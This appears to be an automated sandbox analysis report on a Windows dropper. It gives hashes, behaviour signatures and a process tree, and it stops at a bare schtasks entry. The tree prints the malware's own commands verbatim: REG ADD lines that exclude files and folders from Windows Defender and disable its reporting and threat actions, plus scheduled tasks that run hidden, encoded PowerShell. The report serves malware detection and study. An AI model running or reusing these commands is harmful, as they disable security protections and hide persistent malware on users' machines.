Analysis

  • max time kernel
    156s
  • max time network
    162s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/12/2022, 22:39

General

  • Target

    056bb74f5c05a03a95b3e7dce58d1d9e7b7c75ea5931e334e2e780cc2d7ef652.exe

  • Size

    7.3MB

  • MD5

    40ef1845e265a58399859d07c5dbc8b4

  • SHA1

    544f02e71e5a7bcc8d5726708bcd0db446143669

  • SHA256

    056bb74f5c05a03a95b3e7dce58d1d9e7b7c75ea5931e334e2e780cc2d7ef652

  • SHA512

    800bde4f82a251248ec0fed53649a7d0403ab796485b1a1e1e6fbf1053fdbe0eefa47f75dcaae1f042e67f901c1938a63acdf175d0240e35fa3a44e36a3faf25

  • SSDEEP

    196608:91OcVlmyCiubPXiaTV96aoM3MHCW9XebG7jwkVryR7dbwhcWI:3OMlZYbKGV9nz8HCW9As0kVrTcWI

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\056bb74f5c05a03a95b3e7dce58d1d9e7b7c75ea5931e334e2e780cc2d7ef652.exe
    "C:\Users\Admin\AppData\Local\Temp\056bb74f5c05a03a95b3e7dce58d1d9e7b7c75ea5931e334e2e780cc2d7ef652.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Users\Admin\AppData\Local\Temp\7zS1993.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1264
      • C:\Users\Admin\AppData\Local\Temp\7zS21E0.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1460
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5044
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3568
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3060
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3800
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:5056
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1712
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:1540
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:3796
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gYzsonFNZ" /SC once /ST 21:11:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:1456
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gYzsonFNZ"
                  4⤵
                    PID:1220
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gYzsonFNZ"
                    4⤵
                      PID:2976
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bVFImuFppaqJUwgliC" /SC once /ST 23:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\KBbwMpVHKXJOLynXH\zsDjrXqYZGYCCMW\RIXnSzp.exe\" 06 /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:2152
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2068
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:3372
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:3156
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:4660
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:1116
                      • C:\Users\Admin\AppData\Local\Temp\KBbwMpVHKXJOLynXH\zsDjrXqYZGYCCMW\RIXnSzp.exe
                        C:\Users\Admin\AppData\Local\Temp\KBbwMpVHKXJOLynXH\zsDjrXqYZGYCCMW\RIXnSzp.exe 06 /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:2888
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4616
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4256
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:4700
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:4780
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:4764
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:4508
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:1936
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:2912
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:3936
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:1876
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:4088
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:2044
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:2552
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:1472
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:4952
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:2968
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:688
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:2392
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:2396
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:3800
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:1712
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:3348
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:2456
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:5112
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:636
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:1796
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FEhtMdQMjkDDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FEhtMdQMjkDDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JkrtBlVNEaordImNwyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JkrtBlVNEaordImNwyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MuaXweagbGoU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MuaXweagbGoU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OILhUwneU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OILhUwneU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wuAVpDWXuAUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wuAVpDWXuAUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iMvWHPmKPNWTsNVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iMvWHPmKPNWTsNVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\KBbwMpVHKXJOLynXH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\KBbwMpVHKXJOLynXH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BEtTesUNBkkaxdss\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\BEtTesUNBkkaxdss\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4856
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FEhtMdQMjkDDC" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:2796
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FEhtMdQMjkDDC" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:2516
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FEhtMdQMjkDDC" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:1964
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JkrtBlVNEaordImNwyR" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:3556
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JkrtBlVNEaordImNwyR" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:3824
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MuaXweagbGoU2" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:1212
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MuaXweagbGoU2" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:2068
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OILhUwneU" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:4648
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OILhUwneU" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:1144
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wuAVpDWXuAUn" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:2980
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wuAVpDWXuAUn" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:4000
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iMvWHPmKPNWTsNVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:764
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iMvWHPmKPNWTsNVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:5060
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\KBbwMpVHKXJOLynXH /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:3372
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\KBbwMpVHKXJOLynXH /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:4988
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BEtTesUNBkkaxdss /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:64
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\BEtTesUNBkkaxdss /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:1244
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
